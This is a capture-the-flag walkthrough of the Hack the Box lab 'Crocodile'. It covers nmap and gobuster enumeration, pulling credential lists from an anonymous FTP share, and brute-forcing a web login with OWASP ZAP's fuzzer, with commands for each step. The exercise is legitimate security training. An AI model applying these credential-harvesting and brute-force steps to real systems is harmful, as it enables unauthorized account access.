Hack the Box — Crocodile
HTB Tags: #Linux #PHP #FTP
This is the third box in Tier 1, as part of the Starting Point series, with a focus on directory fuzzing and brute forcing logins on a Linux target. Let’s start by enumerating with the standard commands, ping and nmap.
ping
ping $IP -c 4
nmap
nmap -sC -sV -A $IP -p-
ftp
So we have an open FTP port that accepts anonymous logins. Let’s see what we get.
ftp $IP
Points to note here are the use of ls
to list files and mget
to download all the files. The [anpqy?]? question means “All, No, Prompt Off, Quit, Yes” for when yo download files. You can use wild cards if required, such as * for all.
Checking out the files we see that they are a list of users and their password.
website
The website looks like any other with, in this case links staying internal to the page.
gobuster
With nothing on the webpages themselves, lets check the folder structures in the URL by directory fuzzing.
gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt
We find a few interesting folders, especially one called /dashboard. Reviewing this provides us with a login page.
zap
OK we now have found the login page, let’s start up OWSAP ZAP and then using the built in browser, add a username and password.
Needless to say we failed to gain access but have recorded the details within ZAP.
Within ZAP we have the Request and Response tabs. These provide the headers and body of text that goes from client to server.
Here we see the actual html code for the failure:
In order to start the brute force attack, we need to use the internal Fuzz application. Right click within the Request tab and sellect Fuzz:
Firstly remove any active Fuzz locations by clicking Remove from the right side menu. Next we will add the test_user as the first Fuzz location. So highlight and click Add:
This opens up a Payload window. Now click Add and we get the option to select a payload, with a drop down menu for different types.
In this case we know we already have the two files, so find the first user list and then Add.
Now we see the payload we have just added.
Click on OK and then do the same for the password field. We should now be ready to start the Fuzzer.
Similar to Burp Suite, this will not tell you the correct log in, but by filtering the Size Resp.Body, we will see a noticeable difference.
Here we see that the 1258 bytes is different from all the other tasks that were run, indicating that the username:password that we need to use.
Once we sign in, we are given a server manager dashboard, with the flag showing front and centre!!
summary
A great little challenge, which covers brute forcing from ZAP or Burp Suite. If you get some time try out hydra to get the correct password.